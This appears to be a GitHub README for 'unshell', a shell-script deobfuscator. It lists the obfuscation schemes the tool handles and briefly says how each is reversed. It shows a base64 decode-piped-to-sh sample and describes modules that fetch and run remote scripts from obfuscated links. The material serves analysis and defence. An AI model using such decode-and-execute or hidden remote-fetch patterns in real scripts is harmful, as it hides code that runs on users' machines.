Skip to content

Latest commit

 

History

History
110 lines (90 loc) · 4.27 KB

README.md

File metadata and controls

110 lines (90 loc) · 4.27 KB

unshell_hero

Unshell

The Script Kiddies Nighmare

Effortlessly deobfuscate shell scripts back into source code even with heavenly and multi layered obfuscation. unshell will search for patterns on shell script, determine and deobfuscate accordingly.

Features

  • Zero configuration: There's no need for any configuration
  • Penetrate: Multi layered obfuscation is not a problem
  • Easy to use: just unshell -f encrypted1 encrypted2 in cmd

Supported obfuscation method

Shell Script Compiler (SHC) SHC works internally called execve to shell, it decrypted at runtimes and visible via command line args process

eg: /bin/sh -c "decrypted shell"

Simple Script Compiler (SSC) It works almost the same as SHC but this one uses C++ and shell reads from file descriptor `3`. It visible via `fd` number 3 on the process.
Ri-crypt Ri-crypt works internally called execve to shell, it decrypted at runtimes and visible via command line args process. we can retrive the shell script using `strace`.
bash-obfuscate (Node.js CLI) bash-obfuscate works by randomize the script with random variables then execute it in `eval` command.
Bashrock Bashrock works almost the same way as bash-obfuscate.
TPP Tool The creator of the this obfuscation said "it has anti-decode feature" despite of multilayered base64 encoding that he use can easily decoded. As time of this being written, unshell support up to version 12 of this "tool".
BashProtector Bashrock randomize the script with random variables layered by single `base64` encryption, then execute it in single `eval` command.
Extreme comment/editor EOF trick Some people obfuscate their script with adding generous amounts of comments in the script until it becomes a really big file, tricking average text editor to shit itself while opening the script so people can't open it.
bzip2 Usually used for obfuscating tunneling/VPN scripts. the actual script is compressed with bzip2 and snuck'ed inside the decompression script itself.
Axeron online module The script is actually stored somewhere online (usually public GitHub pages, script kiddies ahh behavior) and script on the module does only execution of the actual script after downloaded from cloud, the file link itself is obfuscated with base64 and rot17.
base64 Not too crazy, just classic echo "ZWNobyBzb21lIGJhc2U2NCBlbmNyeXB0ZWQgc2hpdAo=" | base64 -d | sh.

Installation

spath=$(echo $PATH | cut -d: -f1)
curl -sLo $spath/unshell https://github.com/Rem01Gaming/unshell/raw/main/unshell
chmod +x $spath/unshell

Usage

unshell - Deobfuscate any shell scripts with multiple methods
  Usage: unshell [OPTIONS] [FILE]
  Usage: unshell [OPTIONS] [DIR]

  Options:
    -h, --help
      print this message
    -f, --file [FILE]
      Scripts you wanted to deobfuscate, multi input is supported
    -r, --recursive [DIR]
      Recursively find and deobfuscate all files in the specified directory
    -v, --verbose
      Be verbose
    -d, --execve-delay [SECOND]
      Set custom execve delay time in seconds for SHC and SSC encryption
    -U, --update
      Update the script

  Example usages:
    unshell -f install.sh menu.sh
    unshell -v -f /system/bin/gaming_script
    unshell -d 6.018 -f ./VTK
    unshell -r .

WARNING

Using unshell to retrieve the original shell script from SHC, SSC, or Ri-crypt obfuscation could potentially harm your machine, these obfuscation type requires to executing the script to order to deobfuscate thus leave your machine in danger if script does something malicious. Avoid running unshell with root permissions unless you fully trust the script!

Special Credits

  • kawaii-ghost for decsh (shc and ssc deobfucator).
  • RiProG-id for universal-shell-dec, the inspiration and foundation of this project.